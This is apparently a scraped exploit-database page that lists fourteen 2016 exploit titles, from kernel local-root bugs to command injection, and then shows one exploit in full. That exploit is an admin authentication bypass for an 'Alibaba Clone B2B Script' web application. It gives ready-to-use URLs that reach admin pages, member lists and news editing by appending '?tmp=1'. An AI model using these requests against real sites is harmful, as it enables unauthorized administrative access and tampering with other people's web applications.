
14 new exploits Alibaba Clone B2B Script - Admin Authentication Bypass CMS Made Simple < 2.1.3 & < 1.12.1 - Web Server Cache Poisoning Acunetix WP Security Plugin 3.0.3 - XSS NetCommWireless HSPA 3G10WVE Wireless Router – Multiple Vulnerabilities TRN Threaded USENET News Reader 3.6-23 - Local Stack-Based Overflow IPFire < 2.19 Core Update 101 - Remote Command Execution PHP Imagick 3.3.0 - disable_functions Bypass ImageMagick < 6.9.3-9 - Multiple Vulnerabilities OpenSSL Padding Oracle in AES-NI CBC MAC Check Zabbix Agent 3.0.1 - mysql.size Shell Command Injection McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption Linux (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (/etc/shadow) Linux Kernel 4.4.x (Ubuntu 16.04) - Use-After-Free via double-fdput() in bpf(BPF_PROG_LOAD) Error Path Local Root Exploit Linux (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps
20 lines
621 B
Text
Executable file
20 lines
621 B
Text
Executable file
# Exploit Title: Alibaba Clone B2B Script Admin Authentication Bypass
|
|
# Date: 2016-05-03
|
|
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
|
|
# Vendor Homepage: http://alibaba-clone.com/
|
|
# Version: All Versions
|
|
|
|
Exploit :
|
|
For enter , simply enter the following code
|
|
http://server/admin/adminhome.php?tmp=1
|
|
|
|
For each page is enough to add the following code to the end of url
|
|
example see page members :
|
|
http://server/admin/members.php?tmp=1
|
|
|
|
or add a new news :
|
|
http://server/admin/hot_news_menu.php?tmp=1
|
|
|
|
or edit news :
|
|
http://server/admin/edit_hot_news.php?hotnewsid=44&tmp=1
|
|
|